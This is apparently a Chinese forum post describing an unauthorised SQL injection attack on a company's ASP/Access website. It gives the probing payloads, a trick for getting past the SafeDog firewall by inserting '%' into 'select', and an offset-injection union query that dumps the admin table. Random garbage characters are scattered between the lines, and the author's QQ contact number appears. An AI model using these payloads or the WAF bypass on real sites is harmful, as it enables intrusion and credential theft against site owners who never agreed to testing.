打开网站,一个企业站。
- M" p, h1 L: I/ s( G7 i
! Z" ?7 @ z$ f! n) i- P* `' a
0 b6 s2 E2 t2 H* B9 s顺手加个admin
" y6 v- {6 T S; J7 O9 I/ r
5 y- [- V1 h8 l5 s9 ]9 }( ?9 v, `8 F3 ^
默认后台。
7 h& b0 L( o( ^! v回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
1 I- M8 h* D% J$ E
& p+ j' b) H3 u
! [' G- d9 V0 o% D
" ~2 }" u- f2 c3 s/ H7 s所以就不用御剑扫了,待会直接封IP。
4 A4 X( i7 ?" ?: n 9 S" u. g2 h" o& @( P' n c
用order by语句判断是否存在注入。
v" t) Y/ W% @) v3 Khttp://www.xxx.com /product_show.asp?id=997 order by 1
5 f1 ~, Y# o" N! _' ]http://www.xxx.com /product_show.asp?id=997 order by 1006 ]0 n2 o6 X) F' A. S7 b
现在存在注入,经测试后发现是9个字段。" j: [, O) T5 H
0 i, y" D' E3 U5 H, m0 A+ Y+ O6 K
接下来进行联合查询,猜是否存在admin表。
4 M! `, t" g& i' j1 \ @http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
{1 y* |" W9 _9 X
" X6 `4 ?$ A# n5 {+ D! b# Y3 h: T. x5 s' ]; U; D
6 E. Z; m. _* t5 W+ N在select中间加个%,se%lect绕过安全狗。$ f7 c" Q+ n+ A9 P( W1 R
, N& \" t' `: P8 |+ t' ^& \. }
/ f2 n. H/ a$ F- y( q m发现存在admin表,然后开始手工猜常用的字段。
8 x9 h9 b+ z% n: M/ J5 n纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
" F* e2 _3 D& J$ J
2 W; N! [$ I( |2 ~$ P4 {突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。 N6 p5 n4 u, u3 o$ [
3 }; z- [9 @# F7 c
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
! |4 P t. O% ~ Shttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin8 j) w8 V& M. [% V6 Y8 D
好了,敏感内容出显了。3 E( _2 w! M2 o. n* a
' L z0 W7 E& U8 i I* y* ^3 l( U) {1 l- I% B% ^8 y
' N) ^2 D' z {# _- _0 t |